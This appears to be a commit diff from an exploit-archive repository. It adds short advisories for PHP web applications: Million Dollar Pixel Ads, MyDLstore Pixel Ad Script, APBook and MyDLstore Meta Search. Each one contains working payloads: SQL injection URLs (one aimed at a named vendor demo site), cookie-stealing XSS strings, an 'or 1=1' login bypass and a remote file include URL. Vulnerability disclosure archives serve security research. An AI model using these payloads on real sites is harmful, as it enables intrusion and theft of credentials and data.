Updated 09_21_2014
This commit is contained in:
parent
a64816e686
commit
beb387f81b
5 changed files with 44 additions and 0 deletions
|
@ -31245,3 +31245,7 @@ id,file,description,date,author,platform,type,port
|
|||
34700,platforms/php/webapps/34700.txt,"WebShop Hun 1.062s 'index.php' Local File Include and Cross Site Scripting Vulnerabilities",2009-07-24,u.f.,php,webapps,0
|
||||
34701,platforms/php/webapps/34701.txt,"SkaLinks 1.5 'cat' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-07-24,Moudi,php,webapps,0
|
||||
34702,platforms/php/webapps/34702.txt,"TurnkeySetup Net Marketing 6.0 'faqs.php' Cross Site Scripting Vulnerability",2009-07-24,Moudi,php,webapps,0
|
||||
34703,platforms/php/webapps/34703.txt,"Million Dollar Pixel Ads Cross Site Scripting and SQL Injection Vulnerabilities",2009-07-24,Moudi,php,webapps,0
|
||||
34704,platforms/php/webapps/34704.txt,"MyDLstore Pixel Ad Script 'payment.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
|
||||
34705,platforms/php/webapps/34705.txt,"APBook 1.3 Admin Login Multiple SQL Injection Vulnerabilities",2009-07-21,n3w7u,php,webapps,0
|
||||
34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 'url' Parameter Remote File Include Vulnerability",2009-07-21,Moudi,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
13
platforms/php/webapps/34703.txt
Executable file
13
platforms/php/webapps/34703.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/43443/info
|
||||
|
||||
Million Dollar Pixel Ads is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Million Dollar Pixel Ads Platinum is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.turnkeysetup.net/demos/million/search.php?keywords=1&selectcategory=1+union+select+version()--&submit=search
|
||||
|
||||
http://www.turnkeysetup.net/demos/million/buy1.php?category=11&place="><script>alert(document.cookie);</script>
|
||||
http://www.turnkeysetup.net/demos/million/index2.php?category="><script>alert(document.cookie);</script>
|
||||
http://www.turnkeysetup.net/demos/million/search.php?keywords=1&selectcategory="><script>alert(document.cookie);</script>
|
7
platforms/php/webapps/34704.txt
Executable file
7
platforms/php/webapps/34704.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/43448/info
|
||||
|
||||
MyDLstore Pixel Ad Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/users/payment.php?order_id="><script>alert(document.cookie);</script>
|
11
platforms/php/webapps/34705.txt
Executable file
11
platforms/php/webapps/34705.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/43452/info
|
||||
|
||||
APBook is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
APBook 1.3.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
The following example data is available:
|
||||
|
||||
Put as username and password: 'or 1=1/*
|
9
platforms/php/webapps/34706.txt
Executable file
9
platforms/php/webapps/34706.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43455/info
|
||||
|
||||
MyDLstore Meta Search Engine Script is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
MyDLstore Meta Search Engine Script 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/metasearch/index.php?url=evilcode.txt?&file=Search
|
Loading…
Add table
Reference in a new issue